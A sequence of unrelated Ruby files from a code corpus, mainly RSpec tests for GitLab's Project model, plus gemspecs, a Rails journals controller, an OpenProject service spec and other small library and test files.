describe '#rename_repo' do
before do
# Project#gitlab_shell returns a new instance of Gitlab::Shell on every
# call. This makes testing a bit easier.
allow(project).to receive(:gitlab_shell).and_return(gitlab_shell)
allow(project).to receive(:previous_changes).and_return('path' => ['foo'])
end
it 'renames a repository' do
stub_container_registry_config(enabled: false)
expect(gitlab_shell).not_to receive(:mv_repository)
expect_any_instance_of(SystemHooksService)
.to receive(:execute_hooks_for)
.with(project, :rename)
expect(project).to receive(:expire_caches_before_rename)
expect(project).to receive(:expires_full_path_cache)
project.rename_repo
end
context 'container registry with images' do
let(:container_repository) { create(:container_repository) }
before do
stub_container_registry_config(enabled: true)
stub_container_registry_tags(repository: :any, tags: ['tag'])
project.container_repositories << container_repository
end
subject { project.rename_repo }
it { expect { subject }.to raise_error(StandardError) }
end
context 'gitlab pages' do
it 'moves pages folder to new location' do
expect_any_instance_of(Gitlab::PagesTransfer).to receive(:rename_project)
project.rename_repo
end
end
context 'attachments' do
it 'keeps uploads folder location unchanged' do
expect_any_instance_of(Gitlab::UploadsTransfer).not_to receive(:rename_project)
project.rename_repo
end
context 'when not rolled out' do
let(:project) { create(:project, :repository, storage_version: 1, skip_disk_validation: true) }
it 'moves uploads folder to new location' do
expect_any_instance_of(Gitlab::UploadsTransfer).to receive(:rename_project)
project.rename_repo
end
end
end
it 'updates project full path in .git/config' do
project.rename_repo
expect(project.repository.rugged.config['gitlab.fullpath']).to eq(project.full_path)
end
end
describe '#pages_path' do
it 'returns a path where pages are stored' do
expect(project.pages_path).to eq(File.join(Settings.pages.path, project.namespace.full_path, project.path))
end
end
describe '#migrate_to_hashed_storage!' do
it 'returns nil' do
expect(project.migrate_to_hashed_storage!).to be_nil
end
it 'does not flag as read-only' do
expect { project.migrate_to_hashed_storage! }.not_to change { project.repository_read_only }
end
end
end
describe '#gl_repository' do
let(:project) { create(:project) }
it 'delegates to Gitlab::GlRepository.gl_repository' do
expect(Gitlab::GlRepository).to receive(:gl_repository).with(project, true)
project.gl_repository(is_wiki: true)
end
end
describe '#has_ci?' do
set(:project) { create(:project) }
let(:repository) { double }
before do
expect(project).to receive(:repository) { repository }
end
context 'when has .gitlab-ci.yml' do
before do
expect(repository).to receive(:gitlab_ci_yml) { 'content' }
end
it "CI is available" do
expect(project).to have_ci
end
end
context 'when there is no .gitlab-ci.yml' do
before do
expect(repository).to receive(:gitlab_ci_yml) { nil }
end
it "CI is not available" do
expect(project).not_to have_ci
end
context 'when auto devops is enabled' do
before do
stub_application_setting(auto_devops_enabled: true)
end
it "CI is available" do
expect(project).to have_ci
end
end
end
end
describe '#auto_devops_enabled?' do
set(:project) { create(:project) }
subject { project.auto_devops_enabled? }
context 'when enabled in settings' do
before do
stub_application_setting(auto_devops_enabled: true)
end
it 'auto devops is implicitly enabled' do
expect(project.auto_devops).to be_nil
expect(project).to be_auto_devops_enabled
end
context 'when explicitly enabled' do
before do
create(:project_auto_devops, project: project)
end
it "auto devops is enabled" do
expect(project).to be_auto_devops_enabled
end
end
context 'when explicitly disabled' do
before do
create(:project_auto_devops, project: project, enabled: false)
end
it "auto devops is disabled" do
expect(project).not_to be_auto_devops_enabled
end
end
end
context 'when disabled in settings' do
before do
stub_application_setting(auto_devops_enabled: false)
end
it 'auto devops is implicitly disabled' do
expect(project.auto_devops).to be_nil
expect(project).not_to be_auto_devops_enabled
end
context 'when explicitly enabled' do
before do
create(:project_auto_devops, project: project)
end
it "auto devops is enabled" do
expect(project).to be_auto_devops_enabled
end
end
end
end
describe '#has_auto_devops_implicitly_disabled?' do
set(:project) { create(:project) }
context 'when enabled in settings' do
before do
stub_application_setting(auto_devops_enabled: true)
end
it 'does not have auto devops implicitly disabled' do
expect(project).not_to have_auto_devops_implicitly_disabled
end
end
context 'when disabled in settings' do
before do
stub_application_setting(auto_devops_enabled: false)
end
it 'auto devops is implicitly disabled' do
expect(project).to have_auto_devops_implicitly_disabled
end
context 'when explicitly disabled' do
before do
create(:project_auto_devops, project: project, enabled: false)
end
it 'does not have auto devops implicitly disabled' do
expect(project).not_to have_auto_devops_implicitly_disabled
end
end
context 'when explicitly enabled' do
before do
create(:project_auto_devops, project: project)
end
it 'does not have auto devops implicitly disabled' do
expect(project).not_to have_auto_devops_implicitly_disabled
end
end
end
end
context '#auto_devops_variables' do
set(:project) { create(:project) }
subject { project.auto_devops_variables }
context 'when enabled in instance settings' do
before do
stub_application_setting(auto_devops_enabled: true)
end
context 'when domain is empty' do
before do
stub_application_setting(auto_devops_domain: nil)
end
it 'variables do not include AUTO_DEVOPS_DOMAIN' do
is_expected.not_to include(domain_variable)
end
end
context 'when domain is configured' do
before do
stub_application_setting(auto_devops_domain: 'example.com')
end
it 'variables include AUTO_DEVOPS_DOMAIN' do
is_expected.to include(domain_variable)
end
end
end
context 'when explicitly enabled' do
context 'when domain is empty' do
before do
create(:project_auto_devops, project: project, domain: nil)
end
it 'variables do not include AUTO_DEVOPS_DOMAIN' do
is_expected.not_to include(domain_variable)
end
end
context 'when domain is configured' do
before do
create(:project_auto_devops, project: project, domain: 'example.com')
end
it 'variables include AUTO_DEVOPS_DOMAIN' do
is_expected.to include(domain_variable)
end
end
end
def domain_variable
{ key: 'AUTO_DEVOPS_DOMAIN', value: 'example.com', public: true }
end
end
describe '#latest_successful_pipeline_for' do
let(:project) { build(:project) }
before do
allow(project).to receive(:default_branch).and_return('master')
end
context 'without a ref' do
it 'returns a pipeline for the default branch' do
expect(project)
.to receive(:latest_successful_pipeline_for_default_branch)
project.latest_successful_pipeline_for
end
end
context 'with the ref set to the default branch' do
it 'returns a pipeline for the default branch' do
expect(project)
.to receive(:latest_successful_pipeline_for_default_branch)
project.latest_successful_pipeline_for(project.default_branch)
end
end
context 'with a ref that is not the default branch' do
it 'returns the latest successful pipeline for the given ref' do
expect(project.pipelines).to receive(:latest_successful_for).with('foo')
project.latest_successful_pipeline_for('foo')
end
end
end
describe '#check_repository_path_availability' do
let(:project) { build(:project) }
it 'skips gitlab-shell exists?' do
project.skip_disk_validation = true
expect(project.gitlab_shell).not_to receive(:exists?)
expect(project.check_repository_path_availability).to be_truthy
end
end
describe '#latest_successful_pipeline_for_default_branch' do
let(:project) { build(:project) }
before do
allow(project).to receive(:default_branch).and_return('master')
end
it 'memoizes and returns the latest successful pipeline for the default branch' do
pipeline = double(:pipeline)
expect(project.pipelines).to receive(:latest_successful_for)
.with(project.default_branch)
.and_return(pipeline)
.once
2.times do
expect(project.latest_successful_pipeline_for_default_branch)
.to eq(pipeline)
end
end
end
describe '#after_import' do
let(:project) { build(:project) }
it 'runs the correct hooks' do
expect(project.repository).to receive(:after_import)
expect(project).to receive(:import_finish)
expect(project).to receive(:update_project_counter_caches)
expect(project).to receive(:remove_import_jid)
expect(project).to receive(:after_create_default_branch)
expect(project).to receive(:refresh_markdown_cache!)
project.after_import
end
context 'branch protection' do
let(:project) { create(:project, :repository, :import_started) }
it 'does not protect when branch protection is disabled' do
stub_application_setting(default_branch_protection: Gitlab::Access::PROTECTION_NONE)
project.after_import
expect(project.protected_branches).to be_empty
end
it "gives developer access to push when branch protection is set to 'developers can push'" do
stub_application_setting(default_branch_protection: Gitlab::Access::PROTECTION_DEV_CAN_PUSH)
project.after_import
expect(project.protected_branches).not_to be_empty
expect(project.default_branch).to eq(project.protected_branches.first.name)
expect(project.protected_branches.first.push_access_levels.map(&:access_level)).to eq([Gitlab::Access::DEVELOPER])
end
it "gives developer access to merge when branch protection is set to 'developers can merge'" do
stub_application_setting(default_branch_protection: Gitlab::Access::PROTECTION_DEV_CAN_MERGE)
project.after_import
expect(project.protected_branches).not_to be_empty
expect(project.default_branch).to eq(project.protected_branches.first.name)
expect(project.protected_branches.first.merge_access_levels.map(&:access_level)).to eq([Gitlab::Access::DEVELOPER])
end
it 'protects default branch' do
project.after_import
expect(project.protected_branches).not_to be_empty
expect(project.default_branch).to eq(project.protected_branches.first.name)
expect(project.protected_branches.first.push_access_levels.map(&:access_level)).to eq([Gitlab::Access::MASTER])
expect(project.protected_branches.first.merge_access_levels.map(&:access_level)).to eq([Gitlab::Access::MASTER])
end
end
end
describe '#update_project_counter_caches' do
let(:project) { create(:project) }
it 'updates all project counter caches' do
expect_any_instance_of(Projects::OpenIssuesCountService)
.to receive(:refresh_cache)
.and_call_original
expect_any_instance_of(Projects::OpenMergeRequestsCountService)
.to receive(:refresh_cache)
.and_call_original
project.update_project_counter_caches
end
end
describe '#remove_import_jid', :clean_gitlab_redis_cache do
context 'without an import JID' do
it 'does nothing' do
project = create(:project)
expect(Gitlab::SidekiqStatus)
.not_to receive(:unset)
project.remove_import_jid
end
end
context 'with an import JID' do
it 'unsets the import JID' do
project = create(:project)
create(:import_state, project: project, jid: '123')
expect(Gitlab::SidekiqStatus)
.to receive(:unset)
.with('123')
.and_call_original
project.remove_import_jid
expect(project.import_jid).to be_nil
end
end
end
describe '#wiki_repository_exists?' do
it 'returns true when the wiki repository exists' do
project = create(:project, :wiki_repo)
expect(project.wiki_repository_exists?).to eq(true)
end
it 'returns false when the wiki repository does not exist' do
project = create(:project)
expect(project.wiki_repository_exists?).to eq(false)
end
end
describe '#root_namespace' do
let(:project) { build(:project, namespace: parent) }
subject { project.root_namespace }
context 'when namespace has parent group' do
let(:root_ancestor) { create(:group) }
let(:parent) { build(:group, parent: root_ancestor) }
it 'returns root ancestor' do
is_expected.to eq(root_ancestor)
end
end
context 'when namespace is root ancestor' do
let(:parent) { build(:group) }
it 'returns current namespace' do
is_expected.to eq(parent)
end
end
end
describe '#write_repository_config' do
set(:project) { create(:project, :repository) }
it 'writes full path in .git/config when key is missing' do
project.write_repository_config
expect(project.repository.rugged.config['gitlab.fullpath']).to eq project.full_path
end
it 'updates full path in .git/config when key is present' do
project.write_repository_config(gl_full_path: 'old/path')
expect { project.write_repository_config }.to change { project.repository.rugged.config['gitlab.fullpath'] }.from('old/path').to(project.full_path)
end
it 'does not raise an error with an empty repository' do
project = create(:project_empty_repo)
expect { project.write_repository_config }.not_to raise_error
end
end
describe '#execute_hooks' do
it "executes the project's hooks with the specified scope" do
hook1 = create(:project_hook, merge_requests_events: true, tag_push_events: false)
hook2 = create(:project_hook, merge_requests_events: false, tag_push_events: true)
project = create(:project, hooks: [hook1, hook2])
expect_any_instance_of(ProjectHook).to receive(:async_execute).once
project.execute_hooks({}, :tag_push_hooks)
end
it 'executes the system hooks with the specified scope' do
expect_any_instance_of(SystemHooksService).to receive(:execute_hooks).with({ data: 'data' }, :merge_request_hooks)
project = build(:project)
project.execute_hooks({ data: 'data' }, :merge_request_hooks)
end
it 'executes the system hooks when inside a transaction' do
allow_any_instance_of(WebHookService).to receive(:execute)
create(:system_hook, merge_requests_events: true)
project = build(:project)
# Ideally, we'd test that `WebHookWorker.jobs.size` increased by 1,
# but since the entire spec run takes place in a transaction, we never
# actually get to the `after_commit` hook that queues these jobs.
expect do
project.transaction do
project.execute_hooks({ data: 'data' }, :merge_request_hooks)
end
end.not_to raise_error # Sidekiq::Worker::EnqueueFromTransactionError
end
end
describe '#badges' do
let(:project_group) { create(:group) }
let(:project) { create(:project, path: 'avatar', namespace: project_group) }
before do
create_list(:project_badge, 2, project: project)
create(:group_badge, group: project_group)
end
it 'returns the project and the project group badges' do
create(:group_badge, group: create(:group))
expect(Badge.count).to eq 4
expect(project.badges.count).to eq 3
end
if Group.supports_nested_groups?
context 'with nested_groups' do
let(:parent_group) { create(:group) }
before do
create_list(:group_badge, 2, group: project_group)
project_group.update(parent: parent_group)
end
it 'returns the project and the project nested groups badges' do
expect(project.badges.count).to eq 5
end
end
end
end
context 'with cross project merge requests' do
let(:user) { create(:user) }
let(:target_project) { create(:project, :repository) }
let(:project) { fork_project(target_project, nil, repository: true) }
let!(:merge_request) do
create(
:merge_request,
target_project: target_project,
target_branch: 'target-branch',
source_project: project,
source_branch: 'awesome-feature-1',
allow_maintainer_to_push: true
)
end
before do
target_project.add_developer(user)
end
describe '#merge_requests_allowing_push_to_user' do
it 'returns open merge requests for which the user has developer access to the target project' do
expect(project.merge_requests_allowing_push_to_user(user)).to include(merge_request)
end
it 'does not include closed merge requests' do
merge_request.close
expect(project.merge_requests_allowing_push_to_user(user)).to be_empty
end
it 'does not include merge requests for guest users' do
guest = create(:user)
target_project.add_guest(guest)
expect(project.merge_requests_allowing_push_to_user(guest)).to be_empty
end
it 'does not include the merge request for other users' do
other_user = create(:user)
expect(project.merge_requests_allowing_push_to_user(other_user)).to be_empty
end
it 'is empty when no user is passed' do
expect(project.merge_requests_allowing_push_to_user(nil)).to be_empty
end
end
describe '#branch_allows_maintainer_push?' do
it 'allows access if the user can merge the merge request' do
expect(project.branch_allows_maintainer_push?(user, 'awesome-feature-1'))
.to be_truthy
end
it 'does not allow guest users access' do
guest = create(:user)
target_project.add_guest(guest)
expect(project.branch_allows_maintainer_push?(guest, 'awesome-feature-1'))
.to be_falsy
end
it 'does not allow access to branches for which the merge request was closed' do
create(:merge_request, :closed,
target_project: target_project,
target_branch: 'target-branch',
source_project: project,
source_branch: 'rejected-feature-1',
allow_maintainer_to_push: true)
expect(project.branch_allows_maintainer_push?(user, 'rejected-feature-1'))
.to be_falsy
end
it 'does not allow access if the user cannot merge the merge request' do
create(:protected_branch, :masters_can_push, project: target_project, name: 'target-branch')
expect(project.branch_allows_maintainer_push?(user, 'awesome-feature-1'))
.to be_falsy
end
it 'caches the result' do
control = ActiveRecord::QueryRecorder.new { project.branch_allows_maintainer_push?(user, 'awesome-feature-1') }
expect { 3.times { project.branch_allows_maintainer_push?(user, 'awesome-feature-1') } }
.not_to exceed_query_limit(control)
end
context 'when the requeststore is active', :request_store do
it 'only queries per project across instances' do
control = ActiveRecord::QueryRecorder.new { project.branch_allows_maintainer_push?(user, 'awesome-feature-1') }
expect { 2.times { described_class.find(project.id).branch_allows_maintainer_push?(user, 'awesome-feature-1') } }
.not_to exceed_query_limit(control).with_threshold(2)
end
end
end
end
describe "#pages_https_only?" do
subject { build(:project) }
context "when HTTPS pages are disabled" do
it { is_expected.not_to be_pages_https_only }
end
context "when HTTPS pages are enabled", :https_pages_enabled do
it { is_expected.to be_pages_https_only }
end
end
describe "#pages_https_only? validation", :https_pages_enabled do
subject(:project) do
# set-up dirty object:
create(:project, pages_https_only: false).tap do |p|
p.pages_https_only = true
end
end
context "when no domains are associated" do
it { is_expected.to be_valid }
end
context "when domains including keys and certificates are associated" do
before do
allow(project)
.to receive(:pages_domains)
.and_return([instance_double(PagesDomain, https?: true)])
end
it { is_expected.to be_valid }
end
context "when domains including no keys or certificates are associated" do
before do
allow(project)
.to receive(:pages_domains)
.and_return([instance_double(PagesDomain, https?: false)])
end
it { is_expected.not_to be_valid }
end
end
describe '#toggle_ci_cd_settings!' do
it 'toggles the value on #settings' do
project = create(:project, group_runners_enabled: false)
expect(project.group_runners_enabled).to be false
project.toggle_ci_cd_settings!(:group_runners_enabled)
expect(project.group_runners_enabled).to be true
end
end
describe '#gitlab_deploy_token' do
let(:project) { create(:project) }
subject { project.gitlab_deploy_token }
context 'when there is a gitlab deploy token associated' do
let!(:deploy_token) { create(:deploy_token, :gitlab_deploy_token, projects: [project]) }
it { is_expected.to eq(deploy_token) }
end
context 'when there is no gitlab deploy token associated' do
it { is_expected.to be_nil }
end
context 'when there is a gitlab deploy token associated but it has been revoked' do
let!(:deploy_token) { create(:deploy_token, :gitlab_deploy_token, :revoked, projects: [project]) }
it { is_expected.to be_nil }
end
context 'when there is a gitlab deploy token associated but it is expired' do
let!(:deploy_token) { create(:deploy_token, :gitlab_deploy_token, :expired, projects: [project]) }
it { is_expected.to be_nil }
end
context 'when there is a deploy token associated with a different name' do
let!(:deploy_token) { create(:deploy_token, projects: [project]) }
it { is_expected.to be_nil }
end
context 'when there is a deploy token associated to a different project' do
let(:project_2) { create(:project) }
let!(:deploy_token) { create(:deploy_token, projects: [project_2]) }
it { is_expected.to be_nil }
end
end
context 'with uploads' do
it_behaves_like 'model with mounted uploader', true do
let(:model_object) { create(:project, :with_avatar) }
let(:upload_attribute) { :avatar }
let(:uploader_class) { AttachmentUploader }
end
end
end
| 31.140216 | 156 | 0.671038 |
5da339bacbecf527d40a10ab6a19586d98351433 | 773 | # encoding: utf-8
$:.push File.expand_path("../lib", __FILE__)
require 'hammerspace/version'
Gem::Specification.new do |s|
s.name = "hammerspace"
s.version = Hammerspace::VERSION
s.platform = Gem::Platform::RUBY
s.authors = `git log --format=%an -- lib`.split($/).uniq
s.email = `git log --format=%ae -- lib`.split($/).uniq.grep(/airbnb.com$/)
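# NOTE: the author and email lists are computed from the git history of
# lib/ at gem-build time, so the gem must be packaged from a git checkout.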
s.homepage = "https://github.com/airbnb/hammerspace"
s.summary = "Hash-like interface to persistent, concurrent, off-heap storage"
s.description = "A convenient place to store giant hammers"
s.files = `git ls-files`.split("\n")
s.test_files = `git ls-files -- spec/*`.split("\n")
s.require_path = 'lib'
s.add_runtime_dependency 'gnista', '~> 1.0.1'
end
| 35.136364 | 84 | 0.628719 |
616e7d1eb731c66f9605df01c4618de78401b628 | 1,307 | # coding: utf-8
lib = File.expand_path('../lib/', __FILE__)
$LOAD_PATH.unshift lib unless $LOAD_PATH.include?(lib)
require 'solidus_wishlist/version'
Gem::Specification.new do |s|
s.platform = Gem::Platform::RUBY
s.name = 'solidus_wishlist'
s.version = SolidusWishlist.version
s.summary = 'Add wishlists to Solidus'
s.description = s.summary
s.required_ruby_version = '>= 2.2.2'
s.author = 'John Dyer'
s.email = '[email protected]'
s.license = 'BSD-3-Clause'
s.files = `git ls-files`.split("\n")
s.test_files = `git ls-files -- spec/*`.split("\n")
s.require_path = 'lib'
s.requirements << 'none'
s.add_runtime_dependency 'solidus_core', [">= 1.0.0", "< 3"]
s.add_development_dependency 'factory_bot'
s.add_development_dependency 'ffaker'
s.add_development_dependency 'rspec-rails'
s.add_development_dependency 'sqlite3'
s.add_development_dependency 'capybara'
s.add_development_dependency 'poltergeist'
s.add_development_dependency 'database_cleaner'
s.add_development_dependency 'simplecov'
s.add_development_dependency 'shoulda'
s.add_development_dependency 'coffee-rails'
s.add_development_dependency 'sass-rails'
s.add_development_dependency 'guard-rspec'
s.add_development_dependency 'byebug'
end
| 31.878049 | 62 | 0.717674 |
28bf0d9566ace1afce8167facbaca936c8c4827b | 1,428 | =begin
#Accounting API
#No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator)
The version of the OpenAPI document: 2.0.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 4.0.3
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for XeroRuby::CISOrgSetting
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
describe 'CISOrgSetting' do
before do
# run before each test
@instance = XeroRuby::CISOrgSetting.new
end
after do
# run after each test
end
describe 'test an instance of CISOrgSetting' do
it 'should create an instance of CISOrgSetting' do
expect(@instance).to be_instance_of(XeroRuby::CISOrgSetting)
end
end
describe 'test attribute "cis_contractor_enabled"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "cis_sub_contractor_enabled"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "rate"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 26.444444 | 107 | 0.737395 |
b93c7de26b1ac2eb394f387b47ff74391c42779c | 162 | class PeerReaper
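# Destroys every Peer whose row has not been updated since the given
# cutoff (defaulting to one update period ago); destroy_all runs each
# record's callbacks.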
def self.reap_older_than(time = Peer::UPDATE_PERIOD_MINUTES.minutes.ago)
Peer.where('`peers`.`updated_at` < ?', time).destroy_all
end
end | 32.4 | 74 | 0.746914 |
ff7e548d832a7c01bcd6fbc18328f95dea6764ca | 299 | #Author: Piotr Wojcieszonek
#e-mail: [email protected]
# Copyright 23.03.2016 by Piotr Wojcieszonek
require_relative 'option'
require_relative 'type/raw'
module Lib
module DHCP
class Option202 < Option
#TODO Option202
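# Option 202 appears to carry no structured payload here, so the Raw
# type mixin below stores the value as uninterpreted bytes.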
include Lib::DHCP::Option::Type::Raw
end
end
end
| 16.611111 | 44 | 0.722408 |
bfa6f1fb1b18dfc53ef94126ae0b5975752a0b6d | 820 | # Utilities for:
#
# https://github.com/HakubJozak/sour
#
module Threescale
module Api
module Sour
module Operation
def paginated
param 'page',
description: 'Current page of the list',
dataType: 'int',
paramType: "path",
default: 1
param 'per_page',
description: 'Total number of records per one page (maximum 100)',
dataType: 'int',
default: 20
end
def param_system_name
param 'system_name', 'Human readable and unique identifier'
end
def requires_access_token
param 'access_token',
description: 'Your access token',
dataType: 'string',
required: true,
allowMultiple: false
end
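# Hypothetical usage sketch (assuming a Sour operation DSL that mixes
# these helpers in; names below are illustrative only):
#
#   operation :index do
#     requires_access_token
#     paginated
#     param_system_name
#   end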
end
end
end
end
| 22.162162 | 76 | 0.558537 |
288423faa5f3e5727dfa7b28d14eee5e6c3ae8f5 | 1,053 | require 'test_helper'
class UsersControllerTest < ActionDispatch::IntegrationTest
def setup
@user = users(:michael)
@other_user = users(:archer)
end
test "should redirect index when not logged in" do
get users_path
assert_redirected_to login_url
end
test "should get new" do
get signup_path
assert_response :success
end
test "should redirect destroy when not logged in" do
assert_no_difference 'User.count' do
delete user_path(@user)
end
assert_redirected_to login_url
end
test "should redirect destroy when logged in as a non-admin" do
log_in_as(@other_user)
assert_no_difference 'User.count' do
delete user_path(@user)
end
assert_redirected_to root_url
end
test "should redirect following when not logged in" do
get following_user_path(@user)
assert_redirected_to login_url
end
test "should redirect followers when not logged in" do
get followers_user_path(@user)
assert_redirected_to login_url
end
end
| 22.404255 | 66 | 0.710351 |
877c07d9f865a866f9c90f91048a6c1143c33d51 | 766 | class JournalsController < ApplicationController
before_action :authenticate_user!
def index
@journals = current_user.journals.page(params[:page])
end
def destroy
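# Detaches the journal from the current user's collection; the shared
# Journal record itself is presumably kept for other users.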
@journal = Journal.find(params[:id])
current_user.journals.delete(@journal)
redirect_to journals_path
end
def new
if params[:journal] && params[:journal][:name]
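# Serrano queries the Crossref REST API for journals matching the
# submitted name.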
@journals = Serrano.journals(query: journal_params[:name])
end
@journal = Journal.new
end
def create
@journal = Journal.find_or_create_by(journal_params)
unless current_user.journals.include?(@journal)
current_user.journals << @journal
end
redirect_to journals_path
end
private
def journal_params
params.require(:journal).permit(:issn, :name)
end
end
| 21.277778 | 64 | 0.711488 |
b944e5d823dd180573726c23c7cd45fa48d87454 | 248 | module RiotGamesApi
module LOL
module Model
module Summoner
class RuneSlot
include Virtus.model
attribute :rune_id, Integer
attribute :rune_slot_id, Integer
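# Hypothetical usage: Virtus coerces on assignment, so
# RuneSlot.new(rune_id: '5317', rune_slot_id: '1') yields Integer values.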
end
end
end
end
end
| 16.533333 | 42 | 0.600806 |
5d9da7d84796ed640df33056a38a5eb23474089b | 3,892 | #-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2021 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require 'spec_helper'
describe Users::SetAttributesService, type: :model do
subject(:call) { instance.call(params) }
let(:current_user) { FactoryBot.build_stubbed(:user) }
let(:contract_instance) do
contract = double('contract_instance')
allow(contract)
.to receive(:validate)
.and_return(contract_valid)
allow(contract)
.to receive(:errors)
.and_return(contract_errors)
contract
end
let(:contract_errors) { double('contract_errors') }
let(:contract_valid) { true }
let(:model_valid) { true }
let(:instance) do
described_class.new(user: current_user,
model: model_instance,
contract_class: contract_class,
contract_options: {})
end
let(:model_instance) { User.new }
let(:contract_class) do
allow(Users::CreateContract)
.to receive(:new)
.and_return(contract_instance)
Users::CreateContract
end
let(:params) { {} }
before do
allow(model_instance)
.to receive(:valid?)
.and_return(model_valid)
end
context 'for a new record' do
let(:model_instance) do
User.new
end
it 'is successful' do
expect(call)
.to be_success
end
it 'returns the instance as the result' do
expect(call.result)
.to eql model_instance
end
it 'initializes the notification settings' do
expect(call.result.notification_settings.length)
.to eql(3) # one for every channel
expect(call.result.notification_settings)
.to(all(be_a(NotificationSetting).and(be_new_record)))
end
context 'with params' do
let(:params) do
{
firstname: 'Foo',
lastname: 'Bar'
}
end
it 'assigns the params' do
call
expect(model_instance.firstname).to eq 'Foo'
expect(model_instance.lastname).to eq 'Bar'
end
end
context 'with attributes for the user`s preferences' do
let(:params) do
{
pref: {
auto_hide_popups: true
}
}
end
it 'initializes the user`s preferences with those attributes' do
expect(call.result.pref)
.to be_auto_hide_popups
end
end
end
context 'with an invalid contract' do
let(:contract_valid) { false }
let(:expect_time_instance_save) do
expect(model_instance)
.not_to receive(:save)
end
it 'returns failure' do
is_expected
.not_to be_success
end
it "returns the contract's errors" do
expect(call.errors)
.to eql(contract_errors)
end
end
end
| 26.47619 | 91 | 0.656989 |
d5f195cb89d219d10d5bd1a861586efc07e4ca1b | 448 | require 'opal'
require 'volt/models'
class Test
def self.test1
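# A ReactiveValue wraps a plain value; assigning to .cur fires the
# 'changed' listener registered below.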
a = ReactiveValue.new(1)
listener = a.on('changed') { puts "CHANGED" }
a.cur = 5
listener.remove
ObjectTracker.process_queue
end
def self.test
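# Wrapping a Model exposes reactive attributes; appending to the _cool
# array fires the 'added' listener below.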
a = ReactiveValue.new(Model.new)
a._cool = [1,2,3]
listener = a._cool.on('added') { puts "ADDED" }
a._cool << 4
puts a._cool[3]
listener.remove
ObjectTracker.process_queue
end
end
| 16.592593 | 51 | 0.631696 |
79613a37b2368c2abc6d6bdd85aa11f0c412843c | 1,307 | require File.expand_path("../../spec/dummy/config/environment.rb", __FILE__)
ActiveRecord::Migrator.migrations_paths = [File.expand_path("../../spec/dummy/db/migrate", __FILE__)]
ActiveRecord::Migrator.migrations_paths << File.expand_path('../../db/migrate', __FILE__)
require "rails/test_help"
require "rspec/rails"
# Filter out Minitest backtrace while allowing backtrace from other libraries
# to be shown.
Minitest.backtrace_filter = Minitest::BacktraceFilter.new
# Load fixtures from the engine
if ActiveSupport::TestCase.respond_to?(:fixture_path=)
ActiveSupport::TestCase.fixture_path = File.expand_path("../fixtures", __FILE__)
ActionDispatch::IntegrationTest.fixture_path = ActiveSupport::TestCase.fixture_path
ActiveSupport::TestCase.file_fixture_path = ActiveSupport::TestCase.fixture_path + "/files"
ActiveSupport::TestCase.fixtures :all
end
Dir[ApartmentAcmeClient::Engine.root.join("spec", "apartment_acme_client", "stubs", "*.rb")].sort.each { |f| require f }
RSpec.configure do |config|
# Enable flags like --only-failures and --next-failure
config.example_status_persistence_file_path = ".rspec_status"
# Disable RSpec exposing methods globally on `Module` and `main`
config.disable_monkey_patching!
config.expect_with :rspec do |c|
c.syntax = :expect
end
end
| 40.84375 | 120 | 0.772762 |
edeb9268635256b2b14be24189ed9ef06ccf7722 | 38 | module Basket
VERSION = "0.0.1"
end
| 9.5 | 19 | 0.657895 |
bfba319093432c924e6ab0c64c79c6dce0f210ec | 577 | module EasyTable
module Components
module Spans
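      # Wraps the given title/label/options in a Span component, hangs it off
      # the current tree node as a child, and stores it as that node's content.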
def span(*args, &block)
opts = options_from_hash(args)
title, label = *args
child = node << Tree::TreeNode.new(title || generate_node_name)
span = Span.new(child, title, label, opts, @template, block)
child.content = span
end
private
def node
@node
end
def options_from_hash(args)
args.last.is_a?(Hash) ? args.pop : {}
end
def generate_node_name
"#{node.name}-span-#{node.size}"
end
end
end
end
| 20.607143 | 71 | 0.571924 |
e8f09c78014aa752b674209dea385e4c99e4102c | 3,944 | require 'meta_events/definition/version'
describe ::MetaEvents::Definition::Version do
let(:definition_set) do
out = double("definition_set")
allow(out).to receive(:kind_of?).with(::MetaEvents::Definition::DefinitionSet).and_return(true)
allow(out).to receive(:global_events_prefix).with().and_return("gep")
out
end
let(:klass) { ::MetaEvents::Definition::Version }
let(:instance) { klass.new(definition_set, 3, "2014-02-03") }
it "should require valid parameters for construction" do
expect { klass.new(double("not-a-definition-set"), 1, "2014-01-01") }.to raise_error(ArgumentError)
expect { klass.new(definition_set, "foo", "2014-01-01") }.to raise_error(ArgumentError)
expect { klass.new(definition_set, 1, nil) }.to raise_error
expect { klass.new(definition_set, 1, "2014-01-01", :foo => :bar) }.to raise_error(ArgumentError, /foo/i)
end
it "should return the definition set, number, and introduction time" do
expect(instance.definition_set).to be(definition_set)
expect(instance.number).to eq(3)
expect(instance.introduced).to eq(Time.parse("2014-02-03"))
end
it "should evaluate its block in its own context" do
expect_any_instance_of(klass).to receive(:foobar).once.with(:bonk)
klass.new(definition_set, 3, "2014-02-03") { foobar(:bonk) }
end
it "should return the prefix correctly" do
    expect(instance.prefix).to eq("gep3_")
end
it "should set the property_separator to underscore by default" do
    expect(instance.property_separator).to eq("_")
end
it "should allow setting the property separator to something else in the constructor" do
i2 = klass.new(definition_set, 3, "2014-02-03", :property_separator => 'Z')
    expect(i2.property_separator).to eq("Z")
end
context "with one category" do
let(:category) do
out = double("category")
